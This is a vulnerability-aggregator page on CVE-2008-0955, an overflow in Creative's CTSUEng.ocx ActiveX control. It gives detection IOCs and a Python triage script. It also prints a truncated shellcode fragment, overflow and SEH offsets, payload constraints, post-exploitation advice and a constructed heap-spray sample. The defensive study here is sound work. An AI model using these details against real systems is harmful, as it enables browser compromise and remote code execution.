CVE-2008-0955
Published 2008-05-29
Priority: P3 (56) · CVSS 2.0 base score 9.3 (critical)
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
Exploit: public exploit code available (Exploit-DB and Metasploit, see below)
EPSS: 41.23% (98.5th percentile)
Stack-based buffer overflow in the Creative Software AutoUpdate Engine ActiveX control in CTSUEng.ocx allows remote attackers to execute arbitrary code via a long CacheFolder property value.
Detection & IOCs (extracted from sources)
Shellcode bytes from the public exploit, JavaScript %u-encoded (the final unit is truncated as captured):
%u9090%u9090%ue8fcD%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%uf068%u048a%u685f%ufe98%u0e8a%uff57%u63e7%u6c61c
- The CacheFolder property of CTSUEng.ocx overflows a stack buffer once the value exceeds 260 bytes (260 is MAX_PATH, consistent with an unchecked copy of the folder path into a fixed-size path buffer); at 512 bytes the value overwrites the SEH record and gives reliable code execution. Monitor for unusually long string values assigned to this property.
- Set the kill bit for ActiveX CLSID 0A5FD7C5-A45C-49FC-ADB5-9952547D5715 (CTSUEng.ocx) so Internet Explorer refuses to instantiate it: a DWORD "Compatibility Flags" of 0x400 under HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0A5FD7C5-A45C-49FC-ADB5-9952547D5715}. Note that the kill bit also blocks legitimate use of the control by Creative's web-based updater.
- The exploit heap-sprays with the %u0c0c%u0c0c pattern combined with NOP sleds and shellcode assembled through JavaScript unescape(). Detect this pattern in HTML/JS content delivered to IE clients.
- The Metasploit module targets Windows XP SP0-SP3 and Windows Vista with IE 6.0 SP0-SP2 and IE 7. Payload space is 1024 bytes and the null byte is a bad character.
- The exploit randomizes its JavaScript variable names to evade static signatures, so key detection on behaviour rather than on identifiers: the CLSID being instantiated, large string values assigned to the CacheFolder property of the CTSUEng.ocx object, and the spray pattern above.
- The Metasploit module sets EXITFUNC to 'process', so the payload terminates the browser process when it exits instead of returning cleanly; plan post-exploitation steps (migration, persistence) with that in mind.
- Payloads must fit in 1024 bytes and contain no \x00 bytes; staged or larger payloads must respect both constraints.
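As an added example (not code from this page, from the PoC authors or from Metasploit), the following Python triage script applies the points in the list above to HTML/JS served to IE clients. It keys on the CLSID, on the length of whatever is assigned to CacheFolder (a literal, or a variable grown by a `while (x.length < N)` loop) and on decoded %u0c0c / NOP-sled runs inside unescape() literals, rather than on variable names, which the Metasploit module randomizes. The two documents it scans are constructed samples, not the real exploit; the function names (scan, js_unescape, min_len) are mine, and the script assumes the 260/512-byte thresholds are counted after the control converts the BSTR to an ANSI path, i.e. one byte per ASCII character.

```python
"""Static triage of HTML/JS for the CTSUEng.ocx CacheFolder overflow pattern.

Added example; not code from the page, the PoC authors or Metasploit.
Assumption: the 260/512-byte thresholds are one byte per ASCII character
(BSTR converted to an ANSI path), so a JS string length is used as bytes.
"""
import re

CTSUENG_CLSID = "0A5FD7C5-A45C-49FC-ADB5-9952547D5715"
OVERFLOW_LEN = 260    # stack overflow starts here (from the IOC list above)
SEH_LEN = 512         # SEH record overwritten here (from the IOC list above)
SPRAY_UNIT = 0x0C0C   # the %u0c0c heap-spray unit named above
NOP_UNIT = 0x9090     # two x86 NOPs packed into one UTF-16 unit
MIN_SPRAY_RUN = 2     # consecutive 0x0c0c units before we call it a spray block

_IDENT = r"[A-Za-z_$][\w$]*"
_RE_CLSID = re.compile(r"clsid:\s*\{?([0-9A-Fa-f-]{36})\}?", re.I)
_RE_CF_ASSIGN = re.compile(r"\.\s*CacheFolder\s*=\s*([^;]+);", re.I)
_RE_STR_LIT = re.compile(r"""^\s*(['"])(.*)\1\s*$""", re.S)
# `var x = "...";` initialisers and `while (x.length < N)` growth loops
_RE_VAR_LIT = re.compile(r"""\b(?:var\s+)?(%s)\s*=\s*(['"])([^'"\n]*)\2\s*;""" % _IDENT)
_RE_GROW = re.compile(r"while\s*\(\s*(%s)\.length\s*<\s*(0x[0-9A-Fa-f]+|\d+)\s*\)" % _IDENT)
_RE_UNESC = re.compile(r"""unescape\s*\(\s*(['"])([^'"\n]*)\1\s*\)""")


def js_unescape(s):
    """Emulate JavaScript unescape(): %uXXXX -> one UTF-16 code unit,
    %XX -> one unit, any other character -> its own code unit."""
    units, i = [], 0
    while i < len(s):
        if s.startswith("%u", i) and re.fullmatch(r"[0-9A-Fa-f]{4}", s[i + 2:i + 6]):
            units.append(int(s[i + 2:i + 6], 16)); i += 6
        elif s[i] == "%" and re.fullmatch(r"[0-9A-Fa-f]{2}", s[i + 1:i + 3]):
            units.append(int(s[i + 1:i + 3], 16)); i += 3
        else:
            units.append(ord(s[i])); i += 1
    return units


def longest_run(units, value):
    """Length of the longest run of `value` in a list of code units."""
    best = cur = 0
    for u in units:
        cur = cur + 1 if u == value else 0
        best = max(best, cur)
    return best


def min_len(rhs, js):
    """Lower bound on the length of the expression assigned to CacheFolder.
    A string literal is measured directly; an identifier is measured from its
    literal initialiser and any growth loop, whichever is larger; 0 if unknown."""
    m = _RE_STR_LIT.match(rhs)
    if m:
        return len(js_unescape(m.group(2)))
    name = rhs.strip()
    if not re.fullmatch(_IDENT, name):
        return 0
    best = 0
    for ident, _, lit in _RE_VAR_LIT.findall(js):
        if ident == name:
            best = max(best, len(js_unescape(lit)))
    for ident, bound in _RE_GROW.findall(js):
        if ident == name:
            best = max(best, int(bound, 0))
    return best


def scan(html):
    """Triage one HTML/JS document and return a findings dict."""
    f = {"clsid": False, "cachefolder_len": 0, "overflow": False, "seh": False,
         "spray_run": 0, "nop_run": 0, "verdict": "clean"}
    f["clsid"] = any(c.upper() == CTSUENG_CLSID for c in _RE_CLSID.findall(html))
    for rhs in _RE_CF_ASSIGN.findall(html):          # whatever the variable is called
        f["cachefolder_len"] = max(f["cachefolder_len"], min_len(rhs, html))
    for _, body in _RE_UNESC.findall(html):          # decode every unescape() literal
        units = js_unescape(body)
        f["spray_run"] = max(f["spray_run"], longest_run(units, SPRAY_UNIT))
        f["nop_run"] = max(f["nop_run"], longest_run(units, NOP_UNIT))
    f["overflow"] = f["cachefolder_len"] >= OVERFLOW_LEN
    f["seh"] = f["cachefolder_len"] >= SEH_LEN
    if f["clsid"] and f["overflow"]:
        f["verdict"] = "exploit: CacheFolder overflow"
    elif f["overflow"] or f["spray_run"] >= MIN_SPRAY_RUN:
        f["verdict"] = "suspicious"
    return f


# Constructed samples (not the real exploit): same shape, randomized names.
MALICIOUS_SAMPLE = """<html><body>
<object classid="clsid:0A5FD7C5-A45C-49FC-ADB5-9952547D5715" id="tgt"></object>
<script>
var qX7 = unescape("%u0c0c%u0c0c");
var sC = unescape("%u9090%u9090%u9090%u9090%uCCCC");
while (qX7.length < 0x40000) qX7 += qX7;
var mem = new Array();
for (var i = 0; i < 100; i++) mem[i] = qX7 + sC;
var pad = "A";
while (pad.length < 600) pad += pad;
tgt.CacheFolder = pad;
</script></body></html>"""

BENIGN_SAMPLE = r"""<object classid="clsid:0A5FD7C5-A45C-49FC-ADB5-9952547D5715" id="tgt"></object>
<script>tgt.CacheFolder = "C:\\Program Files\\Creative\\Updates";</script>"""

if __name__ == "__main__":
    for name, doc in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, scan(doc))
```

The benign sample shows why the CLSID alone is not a verdict: Creative's own update page instantiates the same control with a short path. Only the combination of the control and an oversized CacheFolder value is treated as an exploit; a spray or an overflow-length string on its own is flagged as suspicious for analyst review.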
No detection rules found.
Exploit-DB
Creative Software AutoUpdate Engine - ActiveX Control Buffer Overflow (Metasploit) · exploitdb · 2010-05-09 · CVE-2008-0955
---
##
# $Id: creative_software_cachefolder.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
# Module excerpt as captured on this page; the mixins and exploit body are not reproduced here.
class Metasploit3 < Msf::Exploit::Remote

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Creative Software AutoUpdate Engine ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Creative Software AutoUpdate Engine. When
sending an overly long string to the cachefolder() property of CTSUEng.ocx
an attacker may be able to execute arbitrary code.
},
'License' => MSF_LICENSE
Exploit-DB
Creative Software AutoUpdate Engine - ActiveX Stack Overflow · exploitdb · 2008-05-27 · CVE-2008-0955
---
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
CacheFolder property is vulnerable to stack-based buffer overflow after 260 bytes, @ 512 bytes overwrites SEH and allows code execution reliably.
Original Advisory @ http://www.kb.cert.org/vuls/id/501843 and Vulnerability Discovered by Greg Linares of eEye Digital Security
ActiveX Download @ http://www.creative.com/su/Product.asp
MAXIMUM RESPECT TO RGOD (RIP) - A TRUE INSPIRATION
Greetz to KCOPE, ELAZAR, H07, MATTEO, SHINNAI, AURIEMMA and to all the 2008 .CN/.RU/.JP/.* SQL INJECTORS - HAVE FUN WITH THIS YOU BASTARDS!
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Tested On Windows XP SP3 with all patches (like that matters)
Products Af
Metasploit
Creative Software AutoUpdate Engine ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in Creative Software AutoUpdate Engine. When sending an overly long string to the cachefolder() property of CTSUEng.ocx an attacker may be able to execute arbitrary code.
Bugzilla (Red Hat)
Note: the Bugzilla entries below concern Java/JRE vulnerabilities unrelated to CTSUEng.ocx. They are listed here only because their fix lists cite the Red Hat erratum RHSA-2008-0955, whose number collides with this CVE identifier.
CVE-2008-3104 Java RE allows Same Origin Policy to be Bypassed (6687932) · bugzilla · 2008-07-09 · CVSS 6.8 [MEDIUM]
Security vulnerabilities in the Java Runtime Environment may allow an untrusted
applet that is loaded from a remote system to circumvent network access
restrictions and establish socket connections to certain services running on the
local host, as if it were loaded from the system that the applet is running on.
This may allow the untrusted remote applet the ability to exploit any security
vulnerabilities existing in the services it has connected to.
Discussion:
This was resolved via:
http://rhn.redhat.com/errata/RHSA-2008-0595.html (RHEL4, RHEL5)
http://rhn.redhat.com/errata/RHSA-2008-0955.html (RHEL3, RHEL4, RHEL5)
http://rhn.redhat.com/errata/RHSA-2008-0790.html (RHEL4, RHEL5)
http://rhn.redhat.com/errata/RHSA-2
Bugzilla (Red Hat)
CVE-2008-3112 Java Web Start, arbitrary file creation (6703909) · bugzilla · 2008-07-09 · CVSS 10.0 [CRITICAL]
Sunalert, 238905, Second Issue
A vulnerability in Java Web Start may allow an untrusted Java Web Start
application downloaded from a website to create arbitrary files with the
permissions of the user running the untrusted Java Web Start application.
Discussion:
This was resolved via:
http://rhn.redhat.com/errata/RHSA-2008-0595.html (RHEL4, RHEL5)
http://rhn.redhat.com/errata/RHSA-2008-0955.html (RHEL3, RHEL4, RHEL5)
http://rhn.redhat.com/errata/RHSA-2008-0790.html (RHEL4, RHEL5)
http://rhn.redhat.com/errata/RHSA-2008-0636.html (Satellite 5.1)
http://rhn.redhat.com/errata/RHSA-2008-0638.html (Satellite 5.1)
http://rhn.redhat.com/errata/RHSA-2008-0906.html (RHEL4, RHEL5)
http://rhn.redhat.com/errata/RHSA-2008-0594.html (RHE
Bugzilla (Red Hat)
CVE-2008-3113 Java Web Start arbitrary file creation/deletion with user permissions (6704077) · bugzilla · 2008-07-09 · CVSS 10.0 [CRITICAL]
Sunalert, 238905, Third Issue
A vulnerability in Java Web Start may allow an untrusted Java Web Start
application downloaded from a website to create or delete arbitrary files with
the permissions of the user running the untrusted Java Web Start application.
Discussion:
This was resolved via:
http://rhn.redhat.com/errata/RHSA-2008-0595.html (RHEL4, RHEL5)
http://rhn.redhat.com/errata/RHSA-2008-0955.html (RHEL3, RHEL4, RHEL5)
http://rhn.redhat.com/errata/RHSA-2008-0790.html (RHEL4, RHEL5)
http://rhn.redhat.com/errata/RHSA-2008-0636.html (Satellite 5.1)
http://rhn.redhat.com/errata/RHSA-2008-0638.html (Satellite 5.1)
Bugzilla (Red Hat)
CVE-2008-3114 Java Web Start, untrusted application may determine Cache Location (6704074) · bugzilla · 2008-07-09 · CVSS 5.0 [MEDIUM]
Sunalert, 238905, Fourth Issue
A vulnerability in Java Web Start may allow an untrusted Java Web Start
application to determine the location of the Java Web Start cache.
Discussion:
This was resolved via:
http://rhn.redhat.com/errata/RHSA-2008-0595.html (RHEL4, RHEL5)
http://rhn.redhat.com/errata/RHSA-2008-0955.html (RHEL3, RHEL4, RHEL5)
http://rhn.redhat.com/errata/RHSA-2008-0790.html (RHEL4, RHEL5)
http://rhn.redhat.com/errata/RHSA-2008-0636.html (Satellite 5.1)
http://rhn.redhat.com/errata/RHSA-2008-0638.html (Satellite 5.1)
http://rhn.redhat.com/errata/RHSA-2008-0906.html (RHEL4, RHEL5)
http://rhn.redhat.com/errata/RHSA-2008-0594.html (RHEL4, RHEL5)
References
http://secunia.com/advisories/30403
http://www.kb.cert.org/vuls/id/501843
http://www.securityfocus.com/bid/29391
http://www.vupen.com/english/advisories/2008/1668
https://exchange.xforce.ibmcloud.com/vulnerabilities/42673
https://www.exploit-db.com/exploits/5681